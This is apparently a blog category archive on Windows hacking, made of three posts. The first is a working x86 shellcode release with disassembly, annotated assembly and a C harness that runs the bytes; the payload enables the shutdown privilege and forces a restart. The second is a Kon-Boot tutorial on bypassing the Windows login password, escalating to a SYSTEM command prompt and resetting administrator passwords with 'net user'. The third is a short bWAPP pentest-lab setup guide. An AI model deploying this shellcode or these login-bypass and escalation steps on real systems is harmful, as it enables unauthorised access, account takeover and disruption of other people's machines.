Category Archives: (P) Windows

Windows x86 InitiateSystemShutdownA() Shellcode

/*
    # Title: Windows x86 InitiateSystemShutdownA() shellcode
    # Date : 18-08-2016
    # Tested on : Windows 7 x86 starter
*/
 
 
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   8b 59 3c                mov    0x3c(%ecx),%ebx
  15:   01 cb                   add    %ecx,%ebx
  17:   8b 5b 78                mov    0x78(%ebx),%ebx
  1a:   01 cb                   add    %ecx,%ebx
  1c:   8b 73 20                mov    0x20(%ebx),%esi
  1f:   01 ce                   add    %ecx,%esi
  21:   31 d2                   xor    %edx,%edx
 
00000023 <g>:
  23:   42                      inc    %edx
  24:   ad                      lods   %ds:(%esi),%eax
  25:   01 c8                   add    %ecx,%eax
  27:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2d:   75 f4                   jne    23 <g>
  2f:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  36:   75 eb                   jne    23 <g>
  38:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  3f:   75 e2                   jne    23 <g>
  41:   8b 73 1c                mov    0x1c(%ebx),%esi
  44:   01 ce                   add    %ecx,%esi
  46:   8b 14 96                mov    (%esi,%edx,4),%edx
  49:   01 ca                   add    %ecx,%edx
  4b:   89 cf                   mov    %ecx,%edi
  4d:   31 c0                   xor    %eax,%eax
  4f:   50                      push   %eax
  50:   83 ec 1c                sub    $0x1c,%esp
  53:   8d 34 24                lea    (%esp),%esi
  56:   89 16                   mov    %edx,(%esi)
  58:   50                      push   %eax
  59:   68 6f 6b 65 6e          push   $0x6e656b6f
  5e:   68 65 73 73 54          push   $0x54737365
  63:   68 50 72 6f 63          push   $0x636f7250
  68:   68 4f 70 65 6e          push   $0x6e65704f
  6d:   8d 04 24                lea    (%esp),%eax
  70:   50                      push   %eax
  71:   51                      push   %ecx
  72:   ff d2                   call   *%edx
  74:   89 46 04                mov    %eax,0x4(%esi)
  77:   83 c4 10                add    $0x10,%esp
  7a:   31 c9                   xor    %ecx,%ecx
  7c:   68 73 41 42 42          push   $0x42424173
  81:   88 4c 24 01             mov    %cl,0x1(%esp)
  85:   68 6f 63 65 73          push   $0x7365636f
  8a:   68 6e 74 50 72          push   $0x7250746e
  8f:   68 75 72 72 65          push   $0x65727275
  94:   68 47 65 74 43          push   $0x43746547
  99:   8d 0c 24                lea    (%esp),%ecx
  9c:   51                      push   %ecx
  9d:   57                      push   %edi
  9e:   8b 16                   mov    (%esi),%edx
  a0:   ff d2                   call   *%edx
  a2:   83 c4 14                add    $0x14,%esp
  a5:   89 46 08                mov    %eax,0x8(%esi)
  a8:   31 c9                   xor    %ecx,%ecx
  aa:   68 65 73 73 41          push   $0x41737365
  af:   88 4c 24 03             mov    %cl,0x3(%esp)
  b3:   68 50 72 6f 63          push   $0x636f7250
  b8:   68 45 78 69 74          push   $0x74697845
  bd:   8d 0c 24                lea    (%esp),%ecx
  c0:   51                      push   %ecx
  c1:   57                      push   %edi
  c2:   8b 16                   mov    (%esi),%edx
  c4:   ff d2                   call   *%edx
  c6:   83 c4 0c                add    $0xc,%esp
  c9:   89 46 0c                mov    %eax,0xc(%esi)
  cc:   31 c9                   xor    %ecx,%ecx
  ce:   51                      push   %ecx
  cf:   68 61 72 79 41          push   $0x41797261
  d4:   68 4c 69 62 72          push   $0x7262694c
  d9:   68 4c 6f 61 64          push   $0x64616f4c
  de:   8d 0c 24                lea    (%esp),%ecx
  e1:   51                      push   %ecx
  e2:   57                      push   %edi
  e3:   8b 16                   mov    (%esi),%edx
  e5:   ff d2                   call   *%edx
  e7:   83 c4 0c                add    $0xc,%esp
  ea:   68 2e 64 6c 6c          push   $0x6c6c642e
  ef:   68 70 69 33 32          push   $0x32336970
  f4:   68 61 64 76 61          push   $0x61766461
  f9:   8d 0c 24                lea    (%esp),%ecx
  fc:   51                      push   %ecx
  fd:   ff d0                   call   *%eax
  ff:   83 c4 0c                add    $0xc,%esp
 102:   89 c7                   mov    %eax,%edi
 104:   31 c9                   xor    %ecx,%ecx
 106:   68 41 42 42 42          push   $0x42424241
 10b:   88 4c 24 01             mov    %cl,0x1(%esp)
 10f:   68 61 6c 75 65          push   $0x65756c61
 114:   68 65 67 65 56          push   $0x56656765
 119:   68 69 76 69 6c          push   $0x6c697669
 11e:   68 75 70 50 72          push   $0x72507075
 123:   68 4c 6f 6f 6b          push   $0x6b6f6f4c
 128:   8d 0c 24                lea    (%esp),%ecx
 12b:   51                      push   %ecx
 12c:   50                      push   %eax
 12d:   8b 16                   mov    (%esi),%edx
 12f:   ff d2                   call   *%edx
 131:   83 c4 18                add    $0x18,%esp
 134:   89 46 10                mov    %eax,0x10(%esi)
 137:   31 c9                   xor    %ecx,%ecx
 139:   68 73 41 41 41          push   $0x41414173
 13e:   88 4c 24 01             mov    %cl,0x1(%esp)
 142:   68 6c 65 67 65          push   $0x6567656c
 147:   68 72 69 76 69          push   $0x69766972
 14c:   68 6b 65 6e 50          push   $0x506e656b
 151:   68 73 74 54 6f          push   $0x6f547473
 156:   68 41 64 6a 75          push   $0x756a6441
 15b:   8d 0c 24                lea    (%esp),%ecx
 15e:   51                      push   %ecx
 15f:   57                      push   %edi
 160:   8b 16                   mov    (%esi),%edx
 162:   ff d2                   call   *%edx
 164:   83 c4 18                add    $0x18,%esp
 167:   89 46 14                mov    %eax,0x14(%esi)
 16a:   31 c9                   xor    %ecx,%ecx
 16c:   68 77 6e 41 42          push   $0x42416e77
 171:   88 4c 24 03             mov    %cl,0x3(%esp)
 175:   68 75 74 64 6f          push   $0x6f647475
 17a:   68 65 6d 53 68          push   $0x68536d65
 17f:   68 53 79 73 74          push   $0x74737953
 184:   68 69 61 74 65          push   $0x65746169
 189:   68 49 6e 69 74          push   $0x74696e49
 18e:   8d 0c 24                lea    (%esp),%ecx
 191:   51                      push   %ecx
 192:   57                      push   %edi
 193:   8b 16                   mov    (%esi),%edx
 195:   ff d2                   call   *%edx
 197:   83 c4 18                add    $0x18,%esp
 19a:   89 46 18                mov    %eax,0x18(%esi)
 19d:   31 c0                   xor    %eax,%eax
 19f:   50                      push   %eax
 1a0:   83 ec 14                sub    $0x14,%esp
 1a3:   8d 3c 24                lea    (%esp),%edi
 
000001a6 <proc_start>:
 1a6:   8b 46 08                mov    0x8(%esi),%eax
 1a9:   ff d0                   call   *%eax
 1ab:   31 d2                   xor    %edx,%edx
 1ad:   8d 17                   lea    (%edi),%edx
 1af:   52                      push   %edx
 1b0:   31 c9                   xor    %ecx,%ecx
 1b2:   b1 28                   mov    $0x28,%cl
 1b4:   51                      push   %ecx
 1b5:   50                      push   %eax
 1b6:   8b 4e 04                mov    0x4(%esi),%ecx
 1b9:   ff d1                   call   *%ecx
 1bb:   8d 57 04                lea    0x4(%edi),%edx
 1be:   8d 52 04                lea    0x4(%edx),%edx
 1c1:   8d 12                   lea    (%edx),%edx
 1c3:   31 c9                   xor    %ecx,%ecx
 1c5:   68 65 67 65 41          push   $0x41656765
 1ca:   88 4c 24 03             mov    %cl,0x3(%esp)
 1ce:   68 69 76 69 6c          push   $0x6c697669
 1d3:   68 77 6e 50 72          push   $0x72506e77
 1d8:   68 75 74 64 6f          push   $0x6f647475
 1dd:   68 53 65 53 68          push   $0x68536553
 1e2:   8d 0c 24                lea    (%esp),%ecx
 1e5:   31 db                   xor    %ebx,%ebx
 1e7:   52                      push   %edx
 1e8:   51                      push   %ecx
 1e9:   53                      push   %ebx
 1ea:   8b 5e 10                mov    0x10(%esi),%ebx
 1ed:   ff d3                   call   *%ebx
 1ef:   8d 57 04                lea    0x4(%edi),%edx
 1f2:   31 c9                   xor    %ecx,%ecx
 1f4:   41                      inc    %ecx
 1f5:   89 0a                   mov    %ecx,(%edx)
 1f7:   8d 52 04                lea    0x4(%edx),%edx
 1fa:   41                      inc    %ecx
 1fb:   89 4a 08                mov    %ecx,0x8(%edx)
 1fe:   31 d2                   xor    %edx,%edx
 200:   52                      push   %edx
 201:   52                      push   %edx
 202:   52                      push   %edx
 203:   8d 57 04                lea    0x4(%edi),%edx
 206:   52                      push   %edx
 207:   31 d2                   xor    %edx,%edx
 209:   52                      push   %edx
 20a:   8b 17                   mov    (%edi),%edx
 20c:   52                      push   %edx
 20d:   8b 56 14                mov    0x14(%esi),%edx
 210:   ff d2                   call   *%edx
 212:   31 c9                   xor    %ecx,%ecx
 214:   51                      push   %ecx
 215:   68 6e 64 73 21          push   $0x2173646e
 21a:   68 73 65 63 6f          push   $0x6f636573
 21f:   68 41 20 33 20          push   $0x20332041
 224:   68 6d 2e 45 54          push   $0x54452e6d
 229:   68 79 73 74 65          push   $0x65747379
 22e:   68 6e 67 20 53          push   $0x5320676e
 233:   68 61 72 74 49          push   $0x49747261
 238:   68 52 65 73 74          push   $0x74736552
 23d:   8d 1c 24                lea    (%esp),%ebx
 240:   41                      inc    %ecx
 241:   51                      push   %ecx
 242:   31 c9                   xor    %ecx,%ecx
 244:   51                      push   %ecx
 245:   b1 03                   mov    $0x3,%cl
 247:   51                      push   %ecx
 248:   53                      push   %ebx
 249:   31 c9                   xor    %ecx,%ecx
 24b:   51                      push   %ecx
 24c:   8b 4e 18                mov    0x18(%esi),%ecx
 24f:   ff d1                   call   *%ecx
 251:   8b 4e 0c                mov    0xc(%esi),%ecx
 254:   50                      push   %eax
 255:   ff d1                   call   *%ecx
 
 
*/
 
 
 
/*
HANDLE 4 bytes
TOKEN_PRIVILEGES 16 bytes
 
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY = 40 
LUID_AND_ATTRIBUTES 12 bytes
LUID 8 bytes
SE_SHUTDOWN_NAME = "SeShutdownPrivilege"
SE_PRIVILEGE_ENABLED = 2
 
 
required functions:
 
1.  WINADVAPI WINBOOL WINAPI OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
2.  WINBASEAPI HANDLE WINAPI GetCurrentProcess (VOID);
 
3.  WINADVAPI WINBOOL WINAPI LookupPrivilegeValueA (LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
4.  WINADVAPI WINBOOL WINAPI AdjustTokenPrivileges (HANDLE TokenHandle, WINBOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
5.  WINADVAPI WINBOOL WINAPI InitiateSystemShutdownA(LPSTR lpMachineName,LPSTR lpMessage,DWORD dwTimeout,WINBOOL bForceAppsClosed,WINBOOL bRebootAfterShutdown);
 
6.GetProcAddress()
7.ExitProcess()
8.LoadLibraryA() [1 time use]
 
 
 
required dll:
 
1.kernel32.dll
2.kernel32.dll
 
3.advapi32.dll
4.advapi32.dll
5.advapi32.dll
 
6.kernel32.dll
7.kernel32.dll
8.kernel32.dll
 
 
required macro and custom data types:
 
 
#define ANYSIZE_ARRAY 1
     
     
     typedef struct _TOKEN_PRIVILEGES {
      DWORD PrivilegeCount;
      LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];
    } TOKEN_PRIVILEGES,*PTOKEN_PRIVILEGES;
     
     
     typedef struct _LUID_AND_ATTRIBUTES {
      LUID Luid;
      DWORD Attributes;
    } LUID_AND_ATTRIBUTES,*PLUID_AND_ATTRIBUTES;
    typedef LUID_AND_ATTRIBUTES LUID_AND_ATTRIBUTES_ARRAY[ANYSIZE_ARRAY];
    typedef LUID_AND_ATTRIBUTES_ARRAY *PLUID_AND_ATTRIBUTES_ARRAY;
     
     
     
     typedef struct _LUID {
    DWORD LowPart;
    LONG HighPart;
  } LUID,*PLUID;
     
 
c code:
 
 
#include <windows.h>
#include<stdio.h>
#include<process.h>
#include<io.h>
 
int main(){
    HANDLE h;
    TOKEN_PRIVILEGES t;
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&h))
    return 0;
     
     
     
     
    LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&t.Privileges[0].Luid);
    t.PrivilegeCount=1;
    t.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
     
     
     
    AdjustTokenPrivileges(h, FALSE, &t, 0,NULL, 0);
     
    InitiateSystemShutdown(NULL,"shutting",10,FALSE,1);
}
*/
 
/*
section .text
    global _start
_start:
 
xor ecx,ecx
 
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32.dll base address
 
 
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
 
 
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
 
xor edx,edx
 
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g
 
 
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
 
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
 
mov edi,ecx ;kernel32.dll
 
xor eax,eax
push eax
sub esp,28
 
lea esi,[esp]
 
mov [esi],dword edx ;GetProcAddress() at offset 0
 
 
;---------------------------------
;finding address of OpenProcessToken()
 
push eax
push 0x6e656b6f
push 0x54737365
push 0x636f7250
push 0x6e65704f
 
lea eax,[esp]
push eax
push ecx
 
call edx
;-----------------------------------
mov [esi+4],dword eax ;OpenProcessToken() at offset 4
add esp,0x10
;-------------------------
 
;finding address of GetCurrentProcess()
xor ecx,ecx
push 0x42424173
mov [esp+1],byte cl
push 0x7365636f
push 0x7250746e
push 0x65727275
push 0x43746547
 
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;-------------------------
add esp,20
mov [esi+8],dword eax ;GetCurrentProcess() at offset 8
;----------------------------------
 
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
 
lea ecx,[esp]
 
push ecx
push edi
mov edx,dword [esi]
call edx
;-----------------------
add esp,12
mov [esi+12],dword eax ;ExitProcess() at offset 12
;-------------------------------------------
 
;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;--------------------
add esp,12
 
;LoadLibraryA("advapi32.dll")
push 0x6c6c642e
push 0x32336970
push 0x61766461
 
lea ecx,[esp]
push ecx
call eax
;--------------------------
add esp,12
mov edi,eax ; advapi32.dll
;------------------------------
;finding address of LookupPrivilegeValueA()
xor ecx,ecx
push 0x42424241
mov [esp+1],byte cl
push 0x65756c61
push 0x56656765
push 0x6c697669
push 0x72507075
push 0x6b6f6f4c
 
 
lea ecx,[esp]
push ecx
push eax
 
mov edx,dword [esi]
call edx
 
;---------------------------
add esp,0x18
mov [esi+16],dword eax ;LookupPrivilegeValueA() at offset 16
;-------------------------
 
;finding address of AdjustTokenPrivileges()
xor ecx,ecx
push 0x41414173
mov [esp+1],byte cl
push 0x6567656c
push 0x69766972
push 0x506e656b
push 0x6f547473
push 0x756a6441
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;------------------------------------
add esp,0x18
mov [esi+20],dword eax ;AdjustTokenPrivileges() at offset 20
;---------------------------
 
;finding address of InitiateSystemShutdownA()
 
xor ecx,ecx
push 0x42416e77
mov [esp+3],byte cl
push 0x6f647475
push 0x68536d65
push 0x74737953
push 0x65746169
push 0x74696e49
 
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;-------------------------
add esp,0x18
mov [esi+24],dword eax ;InitiateSystemShutdownA() at offset 24
;-------------------------
 
xor eax,eax
push eax
 
 
sub esp,20
lea edi,[esp] ;HANDLE+TOKEN_PRIVILEGES address
 
 
;---------------------------------
;GetProcAddress() at offset 0
;OpenProcessToken() at offset 4
;GetCurrentProcess() at offset 8
;ExitProcess() at offset 12
;LookupPrivilegeValueA() at offset 16
;AdjustTokenPrivileges() at offset 20
;InitiateSystemShutdownA() at offset 24
 
;----------------------------------------
 
 
 
proc_start:
 
;---------------------------
;GetCurrentProcess()
 
mov eax,[esi+8]
call eax
 
;----------------------------
;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&HANDLE)
 
xor edx,edx
lea edx,[edi]
push edx
xor ecx,ecx
mov cl,40
 
push ecx
push eax
 
mov ecx,[esi+4]
call ecx
 
;--------------------------
;LookupPrivilegeValueA(NULL,SE_SHUTDOWN_NAME,&TOKEN_PRIVILEGES.Privileges[0].Luid);
 
lea edx,[edi+4]
lea edx,[edx+4]
 
 
lea edx,[edx]
 
xor ecx,ecx
 
push 0x41656765
mov [esp+3],byte cl
push 0x6c697669
push 0x72506e77
push 0x6f647475
push 0x68536553
 
lea ecx,[esp]
 
 
xor ebx,ebx
 
 
push edx
push ecx
push ebx
 
mov ebx,[esi+16]
call ebx
;----------------------------------
;AdjustTokenPrivileges(HANDLE, FALSE, &TOKEN_PRIVILEGES, 0,NULL, 0);
lea edx,[edi+4]
xor ecx,ecx
inc ecx
mov [edx],dword ecx
lea edx,[edx+4]
inc ecx
mov [edx+8],dword ecx
 
xor edx,edx
push edx
push edx
push edx
 
lea edx,[edi+4]
push edx
 
xor edx,edx
push edx
 
mov edx,dword [edi]
 
push edx
 
mov edx,[esi+20]
call edx
 
;----------------------------
;InitiateSystemShutdownA(NULL,"RestartIng System.ETA 3 seconds!",3,FALSE,1);
 
xor ecx,ecx
 
 
;--------------------------
push ecx
push 0x2173646e
push 0x6f636573
push 0x20332041
push 0x54452e6d
push 0x65747379
push 0x5320676e
push 0x49747261
push 0x74736552
 
 
lea ebx,[esp] ;Message "RestartIng System.ETA 3 seconds!"
;------------------------------
 
inc ecx ;if U want to shutdown system , just remove this line
 
push ecx
 
xor ecx,ecx
push ecx
 
mov cl,3 ;3 seconds
push ecx
push ebx 
xor ecx,ecx
push ecx
 
 
mov ecx,[esi+24]
call ecx
 
;--------------------------
;Exiting
mov ecx,[esi+12]
push eax
call ecx
*/
 
 
#include<stdio.h>
#include<string.h>
char shellcode[]=\
 
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xcf\x31\xc0\x50\x83\xec\x1c\x8d\x34\x24\x89\x16\x50\x68\x6f\x6b\x65\x6e\x68\x65\x73\x73\x54\x68\x50\x72\x6f\x63\x68\x4f\x70\x65\x6e\x8d\x04\x24\x50\x51\xff\xd2\x89\x46\x04\x83\xc4\x10\x31\xc9\x68\x73\x41\x42\x42\x88\x4c\x24\x01\x68\x6f\x63\x65\x73\x68\x6e\x74\x50\x72\x68\x75\x72\x72\x65\x68\x47\x65\x74\x43\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x14\x89\x46\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x68\x2e\x64\x6c\x6c\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x0c\x89\xc7\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x61\x6c\x75\x65\x68\x65\x67\x65\x56\x68\x69\x76\x69\x6c\x68\x75\x70\x50\x72\x68\x4c\x6f\x6f\x6b\x8d\x0c\x24\x51\x50\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x10\x31\xc9\x68\x73\x41\x41\x41\x88\x4c\x24\x01\x68\x6c\x65\x67\x65\x68\x72\x69\x76\x69\x68\x6b\x65\x6e\x50\x68\x73\x74\x54\x6f\x68\x41\x64\x6a\x75\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x14\x31\xc9\x68\x77\x6e\x41\x42\x88\x4c\x24\x03\x68\x75\x74\x64\x6f\x68\x65\x6d\x53\x68\x68\x53\x79\x73\x74\x68\x69\x61\x74\x65\x68\x49\x6e\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x18\x31\xc0\x50\x83\xec\x14\x8d\x3c\x24\x8b\x46\x08\xff\xd0\x31\xd2\x8d\x17\x52\x31\xc9\xb1\x28\x51\x50\x8b\x4e\x04\xff\xd1\x8d\x57\x04\x8d\x52\x04\x8d\x12\x31\xc9\x68\x65\x67\x65\x41\x88\x4c\x24\x03\x68\x69\x76\x69\x6c\x68\x77\x6e\x50\x72\x68\x75\x74\x64\x6f\x68\x53\x65\x53\x68\x8d\x0c\x24\x31\xdb\x52\x51\x53\x8b\x5e\x10\xff\xd3\x8d\x57\x04\x31\xc9\x41\x89\x0a\x8d\x52\x04\x41\x89\x4a\x08\x31\xd2\x52\x52\x52\x8d\x57\x04\x52\x31\xd2\x52\x8b\x17\x52\x8b\x56\x14\xff\xd2\x31\xc9\x51\x68\x6e\x64\x73\x21\x68\x73\x65\x63\x6f\x68\x41\x20\x33\x20\x68\x6d\x2e\x45\x54\x68\x79\x73\x74\x65\x68\x6e\x67\x20\x53\x68\x61\x72\x74\x49\x68\x52\x65\x73\x74\x8d\x1c\x24\x41\x51\x31\xc9\x51\xb1\x03\x51\x53\x31\xc9\x51\x8b\x4e\x18\xff\xd1\x8b\x4e\x0c\x50\xff\xd1";
 
main()
{
printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}

 

Use Kon-Boot to Login to Windows Without Knowing or Changing the Current Password

One of the most obvious and easiest ways to add another layer of protection to your computer is protecting your account with a password. It’s easy enough to do and you can either supply a new password during install, on first run of your new computer or later on through User Accounts in Control Panel. Although not quite as important on a single user machine, passwords are essential when multiple users have access to the same computer or when trying to lock down your child’s user account with parental controls etc.

One of the most common and also frustrating problems you’ll encounter when attempting to troubleshoot or repair a computer, is either the user has forgotten or doesn’t know the logon password or they’re not available to give you that important piece of information. Knowledgeable users will know this actually isn’t as big a problem as it seems and there are various ways to get around a Windows logon password without knowing what it is.

incorrect password during login

For example, if no-one knows or remembers it, the password can be removed from the user account and reset by using a utility from a boot CD. If you want to find out what the password is without resetting it first, you can try to crack it with a tool such as Ophcrack. A few years back we also wrote about a program called DreamPack PL where you can hack into a Windows XP computer without changing the password. Each method has its plus and minus points, but there’s also another way to login to a computer where you don’t actually make any permanent changes to the computer or need to reset/remove the password at all.

Kon-Boot is one of the best tools around which can log you into Windows without knowing the password. It works by hooking into the system BIOS and temporarily changing the contents of the Windows kernel while booting. It then allows you to enter anything as the password during login. The next time you start the computer without Kon-Boot, the original password will be back, the temporary changes will be discarded and the system will behave as if nothing has happened. Kon-Boot has been around a while and updates have brought new features such as privilege escalation and the sticky keys workaround while adding compatibility for more recent operating systems such as Windows 8, 64-bit architecture and UEFI support. The program is split into 2 distinct versions; Kon-Boot free version 1.1 and the paid version (currently 2.2) which has newer features.

Kon-Boot Free Version

Because the last free version of Kon-Boot is 1.1, it lacks some features found in subsequent versions and is a bit limited regarding which Windows operating systems it can work with. For instance, it does not work with any type of 64-bit Windows and is also not compatible with any versions of Windows 8. There is some good news however, the website lists Windows 7 as not compatible either, but we’ve tested extensively and used Kon-Boot on several occasions without issue in any 32-bit version of Windows 7. XP, Vista and Server 2003/2008 are officially supported.

Using Kon-Boot free is easy and you just burn the downloaded ISO file to CD. There is also the possibility to write the image onto a USB flash drive although you don’t use the ISO file to do it. We have covered this procedure in our “Create a Kon-Boot USB Flash Drive” article. Alternatively, if you want a bit more value out of your CD/USB, Kon-Boot is available on the main menu in more recent versions of our favorite bootable repair disc Hiren’s Boot CD.

booting Kon-Boot 1.1

After you Download Kon-Boot  and write it onto CD or USB, simply boot your computer to that device (you will need to set the boot device in the BIOS) and a white screen will popup. Press any key and a black screen will popup showing the process of hooking BIOS functions (the version number 1.0 appears to be an oversight by the developer). After a few more seconds the computer will start to boot normally.

Now when the Logon to Windows screen appears, simply type anything in the password box or leave the password field blank and you’re in! It really is that easy and you simply remove the USB drive or disc so on next reboot Kon-Boot won’t bypass the password again. It is known that not every computer’s BIOS will allow Kon-Boot to work but the majority will be fine if the operating system is compatible.

Kon-Boot Commercial Version

As the free version of Kon-Boot slowly becomes less useful over time because users are moving to 64-bit operating systems or Windows 8, looking at the commercial version is something that begins to make more sense. Currently a personal license for your own use is $15 and for businesses or budding technicians, a commercial license is required at $75. Kon-Boot is now also available for Mac OS X (same price as the Windows version) which allows you to bypass the password or create a new root account to change other user’s passwords.

Kon-boot 2.2 starting up

Besides the 64-bit support and compatibility with Windows 8 (when tested, Windows 8.1 did not work with Kon-Boot 2.2), the commercial version also has better support for systems with a UEFI BIOS when you run Kon-Boot from USB flash drive. If you have a UEFI BIOS, make sure the “Secure Boot” option inside the BIOS is turned off. Kon-Boot is known to not work on domain controllers and it also can’t get past hard drive encryption. In the full Kon-Boot package is a simple installer frontend which gives the options of writing the program to CD or USB (with UEFI support). The ImgBurn burning software is required to burn the ISO file to disc.

Kon-Boot installer utility

Bypassing a password is done the same way as the free version, boot with Kon-Boot and type anything for the password. Kon-Boot paid is also capable of performing privilege escalation which allows you to perform administrative tasks as a non administrative user or Guest. For example, you can boot up the computer with Kon-Boot, log in as a Guest and add a new user or even reset the administrator password! Here’s how it works:

1. Boot the computer with Kon-Boot and select to login as a Guest user or with your standard user account.

2. Open a Command Prompt (Win key+R -> cmd) and type these commands in turn:

copy c:\windows\system32\cmd.exe cmk.exe
cmk
whoami

If the whoami command result is “nt authority\system”, then you have elevated privileges and can run commands such as “net user”:

net user {admin} newpassword – resets the named admins password
net user /add {user} {password} – creates a new user with optional password

Kon-Boot Privilege Escalation

Another paid version feature is “Sticky keys” which is a type of escalation somewhat similar to the privilege escalation above, but this one allows you to open a Command Prompt with System administrator privileges before any users have logged on. The console window will show on the user selection or password entry screen and will allow you to execute similar commands to the desktop privilege escalation function.

privilege escalation using Kon-Boot sticky keys

To bring up the Command Prompt, all you have to do is boot your computer using Kon-Boot and when you reach user selection or password entry, simply tap the Shift key 5 times in quick succession. The new console window has “Administrator” in the title bar and a path of “C:\Windows\System32” which tells you this is an elevated command prompt. Do note that the Sticky Keys function needs to be enabled in Windows, and it should be on by default unless you have turned it off manually. Sticky Keys escalation also works in Windows XP but privilege escalation does not.

Although the free version of Kon-Boot is losing it’s effectiveness as time progresses and users move away from 32-bit Windows, it’s still a useful tool to have around while XP, and Vista/7 32-bit is still frequently used. It’s a shame Kon-Boot free will probably not receive any more major updates to make it more compatible with newer operating systems, but all good things come to an end eventually.

For pretty much the ultimate in Windows password bypassing that works on 32-bit, 64-bit and UEFI equipped computers, and does so quickly and easily without changing files, cracking or removing current passwords, the paid version of Kon-Boot is well worth looking at.


Web Pentest Lab Setup using bWAPP in Windows 10

bWAPP, or a buggy web application, is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

Some of the vulnerabilities included in bWAPP:

  • SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
  • Blind SQL and Blind OS Command injection
  • Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
  • Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
  • Cross-Site Request Forgery (CSRF)
  • AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
  • Malicious, unrestricted file uploads and backdoor files
  • Authentication, authorization and session management issues
  • Arbitrary file access and directory traversals
  • Local and remote file inclusions (LFI/RFI)
  • Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures
  • HTTP parameter pollution and HTTP response splitting
  • Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
  • Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
  • HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
  • Unvalidated redirects and forwards, and cookie poisoning
  • Cookie poisoning and insecure cryptographic storage
  • Server Side Request Forgery (SSRF)
  • XML External Entity attacks (XXE)

Download WAMP server here. Select save or run. Click open. After that follow the next steps.

Next you will see the Select Destination Location screen. Click Next to continue.

Next you will see the Ready to install screen. Click Install to continue.

Once the files are extracted, you will be asked to select your default browser. Select your default browser’s .exe file, then click Open to continue.

